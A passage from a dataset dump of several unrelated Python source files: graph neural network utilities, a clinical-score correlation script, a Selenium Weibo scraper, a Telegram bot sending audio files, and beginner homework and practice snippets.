obj.river is not None:\n data['river'] = self.context.flatten(obj.river, reset=True)\n\n if obj.show_down is not None:\n data['show_down'] = self.context.flatten(obj.show_down, reset=True)\n\n if obj.board is not None:\n board_ = [self.context.flatten(card, reset=True) for card in obj.board]\n data['board'] = board_\n data['winners'] = obj.winners\n\n if obj.earnings is not None:\n data['earnings'] = float(obj.earnings)\n return data\n\n def restore(self, obj):\n raise NotImplementedError\n\n\nclass JsonEncoder:\n\n def encode(self, obj):\n return jsonpickle.encode(obj)\n","sub_path":"poker/jsonencoding.py","file_name":"jsonencoding.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105094550","text":"import numpy as np\nimport pickle as pkl\nimport networkx as nx\nimport scipy.sparse as sp\nfrom scipy.sparse.linalg.eigen.arpack import eigsh\nfrom sklearn import preprocessing\nimport sys\nimport os\nimport gc\nimport math\n\ndef parse_index_file(filename):\n \"\"\"Parse index file.\"\"\"\n index = []\n for line in open(filename):\n index.append(int(line.strip()))\n return index\n\n\ndef sample_mask(idx, l):\n \"\"\"Create mask.\"\"\"\n mask = np.zeros(l)\n mask[idx] = 1\n return np.array(mask, dtype=np.bool)\n\ndef save_sparse_csr(filename,array):\n np.savez(filename,data = array.data ,indices=array.indices,\n indptr =array.indptr, shape=array.shape )\n\ndef load_sparse_csr(filename):\n loader = np.load(filename)\n return sp.csr_matrix(( loader['data'], loader['indices'], loader['indptr']),\n shape = loader['shape'])\n\ndef encode_onehot(labels):\n classes = set(labels)\n classes_dict = {c: np.identity(len(classes))[i, :] for i, c in enumerate(classes)}\n labels_onehot = np.array(list(map(classes_dict.get, labels)), dtype=np.int32)\n return labels_onehot\n\ndef load_data2(dataset_str):\n \"\"\"Load citation network dataset (cora only for now)\"\"\"\n print('Loading {} dataset...'.format(dataset_str))\n path = \"data/\"\n idx_features = np.genfromtxt(\"{}{}.content\".format(path, dataset_str), dtype=np.dtype(str))\n features = sp.csr_matrix(idx_features, dtype=np.float32)\n #features = sp.vstack((allx, tx)).tolil()\n #features[test_idx_reorder, :] = features[test_idx_range, :]\n\n idx_labels = np.genfromtxt(\"{}{}.labels\".format(path, dataset_str), dtype=np.dtype(str))\n labels = encode_onehot(idx_labels)\n\n # build graph\n idx2=list(range(1,1019))\n idx = np.array(idx2, dtype=np.int32)\n print(idx.shape)\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset_str), dtype=np.int32)\n a=list(map(idx_map.get, edges_unordered.flatten()))\n file=open('data.txt','w') \n file.write(str(a)); \n file.close() \n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),dtype=np.int32).reshape(edges_unordered.shape)\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),shape=(labels.shape[0], labels.shape[0]), dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n print('Dataset has {} nodes, {} edges, {} features.'.format(adj.shape[0], edges.shape[0], features.shape[1]))\n\n return features.todense(), adj, labels\n\ndef get_splits(y):\n idx_train = range(70)\t#0,1,2,...,139\n idx_val = range(100, 250)\t#200,201,...,499\n idx_test = range(250, 750)\t#500,501,...,1499\n y_train = np.zeros(y.shape, dtype=np.int32)\n y_val = 
np.zeros(y.shape, dtype=np.int32)\n y_test = np.zeros(y.shape, dtype=np.int32)\n y_train[idx_train] = y[idx_train]\n y_val[idx_val] = y[idx_val]\n y_test[idx_test] = y[idx_test]\n train_mask = sample_mask(idx_train, y.shape[0])\n val_mask = sample_mask(idx_val, y.shape[0])\n test_mask = sample_mask(idx_test, y.shape[0])\n return y_train, y_val, y_test, idx_train, idx_val, idx_test, train_mask, val_mask, test_mask\n\ndef load_data(dataset_str):\n \"\"\"Load data.\"\"\"\n names = ['x', 'y', 'tx', 'ty', 'allx', 'ally', 'graph']\n objects = []\n for i in range(len(names)):\n with open(\"data/ind.{}.{}\".format(dataset_str, names[i]), 'rb') as f:\n if sys.version_info > (3, 0):\n objects.append(pkl.load(f, encoding='latin1'))\n else:\n objects.append(pkl.load(f))\n\n x, y, tx, ty, allx, ally, graph = tuple(objects)\n print(\"graph is....\")\n print(type(graph))\n print(\"allx is....\")\n print(type(allx))#\n test_idx_reorder = parse_index_file(\"data/ind.{}.test.index\".format(dataset_str))\n test_idx_range = np.sort(test_idx_reorder)\n\n if dataset_str == 'citeseer':\n # Fix citeseer dataset (there are some isolated nodes in the graph)\n # Find isolated nodes, add them as zero-vecs into the right position\n test_idx_range_full = range(min(test_idx_reorder), max(test_idx_reorder)+1)\n tx_extended = sp.lil_matrix((len(test_idx_range_full), x.shape[1]))\n tx_extended[test_idx_range-min(test_idx_range), :] = tx\n tx = tx_extended\n ty_extended = np.zeros((len(test_idx_range_full), y.shape[1]))\n ty_extended[test_idx_range-min(test_idx_range), :] = ty\n ty = ty_extended\n\n if dataset_str == 'nell.0.001':\n # Find relation nodes, add them as zero-vecs into the right position\n test_idx_range_full = range(allx.shape[0], len(graph))\n isolated_node_idx = np.setdiff1d(test_idx_range_full, test_idx_reorder)\n tx_extended = sp.lil_matrix((len(test_idx_range_full), x.shape[1]))\n tx_extended[test_idx_range-allx.shape[0], :] = tx\n tx = tx_extended\n ty_extended = np.zeros((len(test_idx_range_full), y.shape[1]))\n ty_extended[test_idx_range-allx.shape[0], :] = ty\n ty = ty_extended\n\n features = sp.vstack((allx, tx)).tolil().toarray()\n print(features)\n features[test_idx_reorder, :] = features[test_idx_range, :]\n\n idx_all = np.setdiff1d(range(len(graph)), isolated_node_idx)\n\n if not os.path.isfile(\"data/planetoid/{}.features.npz\".format(dataset_str)):\n print(\"Creating feature vectors for relations - this might take a while...\")\n features_extended = sp.hstack((features, sp.lil_matrix((features.shape[0], len(isolated_node_idx)))),\n dtype=np.int32).todense()\n features_extended[isolated_node_idx, features.shape[1]:] = np.eye(len(isolated_node_idx))\n features = sp.csr_matrix(features_extended)\n print(\"Done!\")\n save_sparse_csr(\"data/planetoid/{}.features\".format(dataset_str), features)\n else:\n features = load_sparse_csr(\"data/planetoid/{}.features.npz\".format(dataset_str))\n\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph))\n\n features = sp.vstack((allx, tx)).tolil()\n features[test_idx_reorder, :] = features[test_idx_range, :]\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph))\n\n labels = np.vstack((ally, ty))\n labels[test_idx_reorder, :] = labels[test_idx_range, :]\n\n idx_test = test_idx_range.tolist()\n idx_train = range(len(y))\n idx_val = range(len(y), len(y)+500)\n\n train_mask = sample_mask(idx_train, labels.shape[0])\n val_mask = sample_mask(idx_val, labels.shape[0])\n test_mask = sample_mask(idx_test, labels.shape[0])\n\n y_train = np.zeros(labels.shape)\n 
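# The assignments around this point build one masked copy of the label matrix
# per split: each copy keeps the full (n_nodes, n_classes) shape, with rows
# zeroed outside that split's boolean mask. A small self-contained sketch of
# the pattern (function name is illustrative, not from this file):
import numpy as np

def masked_labels(labels, idx):
    mask = np.zeros(labels.shape[0], dtype=bool)
    mask[list(idx)] = True
    out = np.zeros(labels.shape)
    out[mask, :] = labels[mask, :]
    return out, mask
# e.g. y_tr, train_mask = masked_labels(labels, range(140))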
y_val = np.zeros(labels.shape)\n y_test = np.zeros(labels.shape)\n y_train[train_mask, :] = labels[train_mask, :]\n y_val[val_mask, :] = labels[val_mask, :]\n y_test[test_mask, :] = labels[test_mask, :]\n np.savetxt('labels',labels)\n\n return adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask\n\n\ndef sparse_to_tuple(sparse_mx):\n \"\"\"Convert sparse matrix to tuple representation.\"\"\"\n def to_tuple(mx):\n if not sp.isspmatrix_coo(mx):\n mx = mx.tocoo()\n coords = np.vstack((mx.row, mx.col)).transpose()\n values = mx.data\n shape = mx.shape\n return coords, values, shape\n\n if isinstance(sparse_mx, list):\n for i in range(len(sparse_mx)):\n sparse_mx[i] = to_tuple(sparse_mx[i])\n else:\n sparse_mx = to_tuple(sparse_mx)\n\n return sparse_mx\n\n\ndef preprocess_features(features):\n \"\"\"Row-normalize feature matrix and convert to tuple representation\"\"\"\n rowsum = np.array(features.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features)\n print(type(features))\n return sparse_to_tuple(features)\n\n\ndef normalize_adj(adj):\n \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n\n\ndef preprocess_adj(adj):\n \"\"\"Preprocessing of adjacency matrix for simple GCN model and conversion to tuple representation.\"\"\"\n adj_normalized = normalize_adj(adj + sp.eye(adj.shape[0]))\n return sparse_to_tuple(adj_normalized)\n\n\ndef construct_feed_dict(features, support, labels, labels_mask, placeholders):\n \"\"\"Construct feed dictionary.\"\"\"\n feed_dict = dict()\n feed_dict.update({placeholders['labels']: labels})\n feed_dict.update({placeholders['labels_mask']: labels_mask})\n feed_dict.update({placeholders['features']: features})\n feed_dict.update({placeholders['support'][i]: support[i] for i in range(len(support))})\n feed_dict.update({placeholders['num_features_nonzero']: features[1].shape})\n return feed_dict\n\n\ndef chebyshev_polynomials(adj, k):\n \"\"\"Calculate Chebyshev polynomials up to order k. Return a list of sparse matrices (tuple representation).\"\"\"\n print(\"Calculating Chebyshev polynomials up to order {}...\".format(k))\n\n adj_normalized = normalize_adj(adj)\n laplacian = sp.eye(adj.shape[0]) - adj_normalized\n largest_eigval, _ = eigsh(laplacian, 1, which='LM')\n scaled_laplacian = (2. 
/ largest_eigval[0]) * laplacian - sp.eye(adj.shape[0])\n\n t_k = list()\n t_k.append(sp.eye(adj.shape[0]))\n t_k.append(scaled_laplacian)\n\n def chebyshev_recurrence(t_k_minus_one, t_k_minus_two, scaled_lap):\n s_lap = sp.csr_matrix(scaled_lap, copy=True)\n return 2 * s_lap.dot(t_k_minus_one) - t_k_minus_two\n\n for i in range(2, k+1):\n t_k.append(chebyshev_recurrence(t_k[-1], t_k[-2], scaled_laplacian))\n\n return sparse_to_tuple(t_k)\n\ndef xuxiaowei(adj, content, dataset):\n dataset_str = dataset\n adj=adj.todense()\n sample_num = adj.shape[0]\n sim_t = np.zeros((sample_num,sample_num))\n print (\"adj---start\")\n # compute similar by cost similar\n if dataset_str == 'cora':\n m=5429\n if dataset_str == 'citeseer':\n m=4732\n if dataset_str == 'pubmed':\n m=44338\n if dataset_str == 'nell.0.001':\n m=266144\n if dataset_str == 'fk107':\n m=26717\n sum = np.sum(adj,axis=1)\t#n*1\n sum = sum.astype(\"float64\")\n sum_trans = sum.T\n sum = sum*sum_trans\n sum = sum/(2*m)\n sim_t = sum-adj\n sim_t = np.asarray(sim_t)\n scale = np.max(sim_t)-np.min(sim_t)\n sim_t = sim_t/scale\n return sim_t\n\n\t\ndef shijianbo(adj, content):\n content = content.todense()\n sample_num = content.shape[0]\n sim_c = np.zeros((sample_num,sample_num))\n\n # compute similar by cost similar\n content_t = content.T\n sim_c = np.asarray(content*content_t)\n content_2 = np.multiply(content,content)\n sum = np.sum(content_2,axis=1)\n sum_trans = sum.T\n sum = sum*sum_trans\n sum = np.sqrt(sum)\n min = np.ones((sample_num,sample_num))*1e-10\n sum = sum+min\n sim_c = sim_c/sum\n sim_c = np.asarray(sim_c)\n sim_c_row = np.sum(sim_c,axis=1)\n one_vec = np.ones(sample_num)\n one_vec = one_vec.T\t\t#1*n\n sim_c_row = sim_c_row*one_vec\n sim_c = sim_c/(sim_c_row+min)\n scale = np.max(sim_c)-np.min(sim_c)\n sim_c = sim_c/scale\n\n #KNN\n print (\"content------KNN\")\n k_values=100\n sample_2_final=np.zeros((sample_num,sample_num))\n for i in range(sample_num):\n sample_2_sort=sorted(sim_c[i],reverse=True)\n k_order=0\n for j in range(k_values):\n find_index=np.where(sim_c[i]==sample_2_sort[j])\n for k in range(len(find_index[0])):\n sample_2_final[i][find_index[0][k]]=sample_2_sort[j]\n k_order+=1\n if (k_order==k_values):\n break\n if (k_order==k_values):\n break\n print (\"content------KNN---end\")\n print (np.max(sample_2_final))\n #sample_2_final=sim_c\n return sample_2_final\n\t\ndef NMI(A,B):\n B=np.argmax(B,axis=1)\n # len(A) should be equal to len(B)\n total = len(A)\n A_ids = set(A)\n B_ids = set(B)\n #Mutual information\n MI = 0\n eps = 1.4e-45\n a=0\n for idA in A_ids:\n for idB in B_ids:\n if(idA>0):\n a=1\n if(a==1):\n idAOccur = np.where(A==idA)\n idBOccur = np.where(B==idB)\n idABOccur = np.intersect1d(idAOccur,idBOccur)\n px = 1.0*len(idAOccur[0])/total\n py = 1.0*len(idBOccur[0])/total\n pxy = 1.0*len(idABOccur)/total\n MI = MI + pxy*math.log(pxy/(px*py)+eps,2)\n # Normalized Mutual information\n Hx = 0\n for idA in A_ids:\n idAOccurCount = 1.0*len(np.where(A==idA)[0])\n Hx = Hx - (idAOccurCount/total)*math.log(idAOccurCount/total+eps,2)\n Hy = 0\n for idB in B_ids:\n idBOccurCount = 1.0*len(np.where(B==idB)[0])\n Hy = Hy - (idBOccurCount/total)*math.log(idBOccurCount/total+eps,2)\n MIhat = 2.0*MI/(Hx+Hy)\n return MIhat","sub_path":"gcn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"187448441","text":"import os\nimport numpy as np\nimport pandas as pd\nimport 
matplotlib.pyplot as plt\nimport nibabel as nib\nimport pandas as pd\nimport nibabel as nib\nimport json\nfrom nilearn import plotting\nfrom nilearn import image\nfrom scipy.stats.stats import pearsonr\nimport shutil\nimport scipy.stats\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport parsimony.utils.check_arrays as check_arrays\nfrom sklearn import preprocessing\nimport statsmodels.api as sm\nfrom statsmodels.formula.api import ols\nimport seaborn as sns\n\nDATA_PATH = \"/neurospin/brainomics/2016_schizConnect/2018_analysis_2ndpart_clinic/data\"\nINPUT_CLINIC_FILENAME = \"/neurospin/abide/schizConnect/data/december_2017_clinical_score/schizconnect_COBRE_assessmentData_4495.csv\"\nU_all = np.load(\"/neurospin/brainomics/2016_schizConnect/2018_analysis_2ndpart_clinic/results/clustering/U_scores_corrected/U_all.npy\")\ny_all = np.load(\"/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/VBM/all_subjects/data/y.npy\")\n\n\n\npop = pd.read_csv(os.path.join(DATA_PATH,\"pop_cobre_scz.csv\"))\nclinic = pd.read_csv(INPUT_CLINIC_FILENAME)\nage = pop[\"age\"].values\nsex = pop[\"sex_num\"].values\n\ny = np.load(\"/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/VBM/all_subjects/data/y.npy\")\nsite = np.load(\"/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/VBM/all_subjects/data/site.npy\")\nsite = site[y==1]\nlabels_cluster = np.load(\"/neurospin/brainomics/2016_schizConnect/\\\n2018_analysis_2ndpart_clinic/results/clustering/corrected_results/\\\ncorrection_age_sex_site/clusters_with_controls/2_clusters_solution/labels_cluster.npy\")\nlabels_cluster = labels_cluster[site==1]\nU0 =U_all[:,0][y_all==1][site==1]\n\n\ndf_scores = pd.DataFrame()\ndf_scores[\"subjectid\"] = pop.subjectid\nfor score in clinic.question_id.unique():\n df_scores[score] = np.nan\n\nfor s in pop.subjectid:\n curr = clinic[clinic.subjectid ==s]\n for key in clinic.question_id.unique():\n if curr[curr.question_id == key].empty == False:\n df_scores.loc[df_scores[\"subjectid\"]== s,key] = curr[curr.question_id == key].question_value.values[0]\n\n\n\n################################################################################\n\ndf_stats = pd.DataFrame(columns=[\"r\",\"p\"])\ndf_stats.insert(0,\"clinical_scores\",clinic.question_id.unique())\n################################################################################\noutput = \"/neurospin/brainomics/2016_schizConnect/2018_analysis_2ndpart_clinic/\\\nresults/clustering/corrected_results/correction_age_sex_site/clusters_with_controls/\\\n2_clusters_solution/cobre/cobre_correlation_clinics_p_values.csv\"\n\nkey_of_interest= list()\nfor key in clinic.question_id.unique():\n try:\n neurospycho = df_scores[key].astype(np.float).values\n\n df = pd.DataFrame()\n df[key] = neurospycho[np.array(np.isnan(neurospycho)==False)]\n df[\"age\"] = age[np.array(np.isnan(neurospycho)==False)]\n df[\"sex\"] = sex[np.array(np.isnan(neurospycho)==False)]\n df[\"labels\"]=labels_cluster[np.array(np.isnan(neurospycho)==False)]\n df[\"U0\"]=U0[np.array(np.isnan(neurospycho)==False)]\n r,p = scipy.stats.pearsonr(df[\"U0\"],df[key])\n\n df_stats.loc[df_stats.clinical_scores==key,\"r\"] = r\n df_stats.loc[df_stats.clinical_scores==key,\"p\"] = p\n if p<0.05:\n print(key)\n print(p)\n key_of_interest.append(key)\n\n\n except:\n df_stats.loc[df_stats.clinical_scores==key,\"r\"] = np.nan\n df_stats.loc[df_stats.clinical_scores==key,\"p\"] = 
np.nan\ndf_stats.to_csv(output)\n\n\n\n\n################################################################################\noutput = \"/neurospin/brainomics/2016_schizConnect/2018_analysis_2ndpart_clinic/\\\nresults/clustering/corrected_results/correction_age_sex_site/clusters_with_controls/\\\n2_clusters_solution/cobre/correlations\"\n\n\nfor key in key_of_interest:\n plt.figure()\n df = pd.DataFrame()\n neurospycho = df_scores[key].astype(np.float).values\n df[key] = neurospycho[np.array(np.isnan(neurospycho)==False)]\n df[\"age\"] = age[np.array(np.isnan(neurospycho)==False)]\n df[\"sex\"] = sex[np.array(np.isnan(neurospycho)==False)]\n df[\"labels\"]=labels_cluster[np.array(np.isnan(neurospycho)==False)]\n df[\"U0\"]=U0[np.array(np.isnan(neurospycho)==False)]\n r,p = scipy.stats.pearsonr(df[\"U0\"],df[key])\n df['color']= np.where( df['labels']==True , \"r\", \"g\")\n D_color_label = {\"r\":\"Cluster 2\",\"g\":\"Cluster 1\"}\n colors = list(set(df[\"color\"]))\n labels = [D_color_label[x] for x in set(df[\"color\"])]\n\n ax = sns.regplot(data = df, x =\"U0\",y=key,scatter_kws={'facecolors':df['color'],'s':50})\n ind = 0\n for i, grp in df.groupby(['color']):\n grp.plot(kind = 'scatter', x = 'U0', y = key, c = i, ax = ax, label = labels[ind], zorder = 0)\n ind += 1\n ax.legend()\n plt.title(\"Pearson corr: R = %s, and p= %s\"%(r,p))\n plt.savefig(os.path.join(output,\"%s.png\"%key))\n\n\n\n#from scipy import stats\n#slope, intercept, r_value, p_value, std_err = stats.linregress(df[\"U0\"],df[key])\n#print(slope, intercept, r_value, p_value, std_err)","sub_path":"2016_schizConnect/2018_analysis_2ndpart_clinic/clustering_based_on_PCs/corrected/correction_age_sex_site/clusters_with_controls/2_clusters_solution/02_clusters_correlationscobre.py","file_name":"02_clusters_correlationscobre.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"142447636","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\nbrower=webdriver.Safari()\nurl='https://weibo.com'\nbrower.get(url)\ntime.sleep(10)\nwait = WebDriverWait(brower, 10)\nbrower.maximize_window()\ntry:\n time.sleep(1)\n clic = brower.find_element_by_xpath('//a[@href=\"javascript:void(0)\"]')\n time.sleep(1)\n clic.click()\nexcept:\n brower.quit()\n print('error')\ntry:\n time.sleep(1)\n clic = brower.find_element_by_xpath('//a[@action-data=\"tabname=qrcode\"]')\n clic.click()\nexcept:\n brower.quit()\n print('error')\ntry:\n time.sleep(5)\n s=input('enter yes to confirm you have scan the code')\n if s!='':\n brower.refresh()\n inp = brower.find_element_by_xpath('//input[@node-type=\"searchInput\"]')\n time.sleep(3)\n inp.send_keys('乘风破浪的姐姐')\nexcept:\n brower.quit()\n print('error')\ntry:\n time.sleep(1)\n clic = brower.find_element_by_xpath('//a[@node-type=\"searchSubmit\"]')\n time.sleep(1)\n clic.click()\nexcept:\n brower.quit()\n print('error')\nfile1=open('demo1.txt','w')#微博和评论\nfile2=open('demo2.txt','w')#仅微博\nfile3=open('demo3.txt','w')#仅评论\nfor i in range(20):\n try:\n time.sleep(3)\n clics = brower.find_elements_by_xpath('//a[@action-type=\"feed_list_comment\"]')\n for clic in clics:\n clic.send_keys(Keys.ENTER)\n time.sleep(1)\n clics = 
brower.find_elements_by_xpath('//a[@action-type=\"fl_unfold\"]')\n for clic in clics:\n clic.send_keys(Keys.ENTER)\n time.sleep(1)\n time.sleep(1)\n txts = brower.find_elements_by_xpath('//p[@node-type=\"feed_list_content\"]')\n time.sleep(1)\n comments = brower.find_elements_by_xpath('//div[@class=\"card-together\"]')\n time.sleep(1)\n for txt, comment in zip(txts, comments):\n file1.writelines('-----微博正文-----')\n file1.writelines(txt.text)\n file2.writelines(txt.text)\n #print(txt.text)\n try:\n infos = comment.find_elements_by_xpath('//div[@class=\"txt\"]')\n for info in infos:\n file1.writelines(info.text)\n file3.writelines(info.text)\n #print(info.text)\n except:\n file1.writelines('no comment!')\n file3.writelines('no comment!')\n try:\n clic = brower.find_element_by_xpath('//a[@class=\"next\"]')\n clic.send_keys(Keys.ENTER)\n except:\n brower.quit()\n except:\n brower.quit()\n print('error')\nbrower.quit()\n\n\n","sub_path":"爬虫版本迭代过程/crawler3.0.py","file_name":"crawler3.0.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"41174152","text":"# -*- coding: utf-8 -*-\nimport config\nimport telebot\nimport os\nimport time\nbot = telebot.TeleBot(config.TOKEN)\n\n@bot.message_handler(commands=['test'])\ndef find_file_ids(message):\n for file in os.listdir('.venv/botbrein/music/'):\n if file.split('.')[-1] == 'ogg':\n f = open('.venv/botbrein/music/'+file, 'rb')\n msg = bot.send_voice(message.chat.id, f, None)\n # отправка file_id:\n bot.send_message(message.chat.id, msg.voice.file_id, reply_to_message_id=msg.message_id)\n time.sleep(3)\n\nif __name__ == '__main__':\n bot.infinity_polling()\n","sub_path":"Downloadmusicbot.py","file_name":"Downloadmusicbot.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"119884129","text":"import time\nfrom decimal import Decimal\ntask_2_a = lambda element: element % 2 == 0 and 1 < element < 100 and element % 10 != 0\ntask_2_b = lambda elem: elem // 2 if elem % 2 == 0 else elem * 2\ntask_2_c = lambda result, a: result + len([a for a in a if a.islower()])\ntask_2_d = lambda i: sum([i for i in i if i >= 0]) / len([i for i in i if i >= 0])\n\n\ndef task_3(is_slow=False):\n a, b = 0, 1\n while a < 1000000000:\n if is_slow:\n time.sleep(0.5)\n yield a\n a, b = b, a+b\n\n\ndef task_4(func):\n def new_func(*args, **kwargs):\n new_args = [arg for arg in args]\n arguments = []\n kwargs_keys = [key for key in kwargs]\n kwargs_values = []\n for i in new_args:\n if isinstance(i, (int, float, Decimal)) and not isinstance(i, bool):\n a = -i\n arguments.append(a)\n elif isinstance(i, (str, list)):\n a = i[::-1]\n arguments.append(a)\n elif isinstance(i, dict):\n a = {key[::-1]: value for key, value in i.items()}\n arguments.append(a)\n elif isinstance(i, bool):\n if i is True:\n arguments.append(False)\n else:\n arguments.append(True)\n for value in kwargs.values():\n if isinstance(value, (int, float, Decimal)) and not isinstance(value, bool):\n b = -value\n kwargs_values.append(b)\n elif isinstance(value, (str, list)):\n b = value[::-1]\n kwargs_values.append(b)\n elif isinstance(value, dict):\n b = {key[::-1]: value for key, value in value.items()}\n kwargs_values.append(b)\n elif isinstance(value, bool):\n if value is True:\n kwargs_values.append(False)\n else:\n kwargs_values.append(True)\n kwargs_dict = dict(zip(kwargs_keys, kwargs_values))\n dict3 = dict(sorted([(key, 
value) for (key, value) in kwargs_dict.items()])[:5])\n return func(*arguments[:5], **dict3)\n return new_func\n\n\n\n","sub_path":"homework_old/homework3_5.py","file_name":"homework3_5.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"199379361","text":"#coding=utf-8\n\n\n'''\nnameA = input(\"輸入A同學姓名: \")\nscoreA = input(\"輸入A同學分數: \")\nnameB = input(\"輸入B同學姓名: \")\nscoreB = input(\"輸入B同學分數: \")\nprint(\"姓名\\t分數\")\nprint(nameA+\"\\t\"+scoreA)\nprint(nameB+\"\\t\"+scoreB)\n'''\n\n'''\nmoney = 1000\nfor i in range(20):\n\tmoney *= 1.005\n\t\nprint(money)\nprint(1000*(1.005**20))\n'''\n'''\nspeed = 100*128\nfile = 256*1024\nprint(file/speed)\n'''\n'''\nstr = \"PLEASE CONVERT THIS SENTENCE TO LOWER CASE.\"\nprint(str.lower())\t#變小寫\n'''\n'''\nborn = input(\"出生\")\nnow = input(\"現在\")\nage = int(now) - int(born)\nprint(\"%d\" %age)\n'''\n'''\ncard = input(\"卡號: \")\nprint(\"%016d\" %int(card))\n'''\n'''\nyear = input(\"年\")\nmonth = input(\"月\")\nday = input(\"日\")\nprint(\"%d.%02d.%02d\" %(int(year),int(month),int(day) ) )\n'''\n\n'''\ntest = \"I can\\n hi\\t\"\n#(arr,arr2) = test.split('.')\narr = test.split()\nprint(arr)\n#print(arr2)\n'''\n\n'''\narr = [123, \"betty\", 123.5, 'c']\n\nfor x in arr:\n print(x)\n'''\n\n'''\nscores = {}\nresult_f = open(\"Result.txt\")\nfor line in result_f:\n (name, score) = line.split()\n scores[score] = name\nresult_f.close()\n\n\nfor key in sorted(scores.keys(), reverse = True):\n print(scores[key] + \" \" + key)\n#test print scores\n#print(\"\\n\" + scores[\"7.81\"])\n'''\n\n'''\ndef changeBarHelper(variable):\n variable = variable * 2\n return variable\n\n\nbar = 20\nprint(bar)\nbar = changeBarHelper(bar)\nprint(bar)\n'''\n\n'''\ndef outer(x, y):\n #def inner(a = x, b = y):\n # print(\"1\")\n # return a*b\n\n #print(\"2\")\n #return inner\n return lambda a = x, b = y: a*b\n\nx = outer(2,4)\nprint (\"output: \" + str(x()))\n'''\n\n'''\ndef outer(x):\n fillin = [None]\n def inner(i, self = fillin):\n print(i)\n if i: self[0](i-1)\n\n fillin[0] = inner\n print(\"hi\")\n inner(x)\n\nprint(outer(3))\n'''\n\n'''\nclass ThirdClass:\n def __init__(self, value):\n print(\"init\")\n self.data = value\n def __add__(self, other):\n print(\"add\")\n return ThirdClass(self.data + other)\n def __mul__(self, other):\n print(\"mul\")\n #return ThirdClass(self.data * other)\n return ThirdClass(self.data + other)\n def display(self):\n print('Current value = \"%s\" ' %self.data)\n\n \n\na = ThirdClass(\"abc\")\na.display()\nprint(\"----------\")\nb = a + 'xyz'\nb.display()\n#print(\"----------\")\n#b * 3\n#b.display()\nprint(\"----------\")\nc = a*'xyz'\nc.display()\n'''\n'''\nimport json #內建模組\n\njsondata = {\"responseData\": {\"translatedText\":\"hello!\"},\n \"responseDetails\": None,\n \"responseStatus\": 200}\nencodetext = json.dumps(jsondata)\ndecode = json.loads(encodetext)\n\nprint(type(encodetext))\nprint(encodetext)\n\nprint(type(decode))\nprint(decode)\n\nprint(decode['responseData']['translatedText'])\nprint(decode[\"responseStatus\"])\n'''\n'''\njsondata = '{\"responseData\": {\"translatedText\":\"蟒蛇石頭!\"}, \"responseDetails\": null, \"responseStatus\": 200}'\ntext = json.loads(jsondata)\nprint('翻譯結果:',text['responseData']['translatedText'])\n'''\n\n'''\nnum = 5\ndef change_dict(in_dict):\n global num\n in_dict[str(num)] = 'E'\n num += 1\n print(\"in: \", in_dict)\n\ndict1 = {'1':'A', '2':'B', '3':'C', '4':'D'}\ndict2 = dict()\nfor num2 in range(0,3):\n\n 
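# change_dict mutates dict2 in place (dicts are passed by reference), so the\n    # dict1.update(dict2) below sees every key the function has added so far\n    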
change_dict(dict2)\n dict1.update(dict2)\n\n print(dict2)\n #dict2.clear()\n\nprint(dict1)\n\ndict 就算不傳進 function 也可以做修改\n只是好像不太建議\n'''\n\n'''\ndict1 = {'1':'A', '2':'B', '3':'C', '4':'D'}\nprint(len(dict1))\ndict1['5'] = dict1.pop('1')\nprint(dict1)\nprint(len(dict1))\n'''\n\n'''\nimport os\nimport re\n\nurl = \"/smw/index.php?title=Special:RecentChangesLinked\"\nstr1 = os.path.splitext(url)[-1]\nstr2 = str1.find(\"?\")\nprint(str1[:str2])\nprint(str2)\n'''\n\n'''\ndict1 = {'1':'A', '2':'B', '3':'C'}\ntest = dict1.get('4')\nprint(test)\nprint(type(test))\n'''\n\n'''\nfile1 = open('test.txt', 'r', encoding='utf-8')\nfor content in file1.readlines():\n str1 = content\n\nprint(str1)\nprint(len(str1))\n\nwrite_f = open('test2.txt', 'wb')\nwrite_f.write(str1.encode('utf-8'))\n\nwrite_f.close()\nprint(\"=====\")\nfile2 = open('test2.txt', 'rb')\n\nbyte = file2.read(3)\nwhile byte != b'':\n print(byte)\n print(byte.decode('UTF-8'))\n byte = file2.read(3)\n'''\n\n'''\nstr1 = \"你給我試試看ㄚㄚㄚㄚ\"\nfile3 = open('test3.txt', 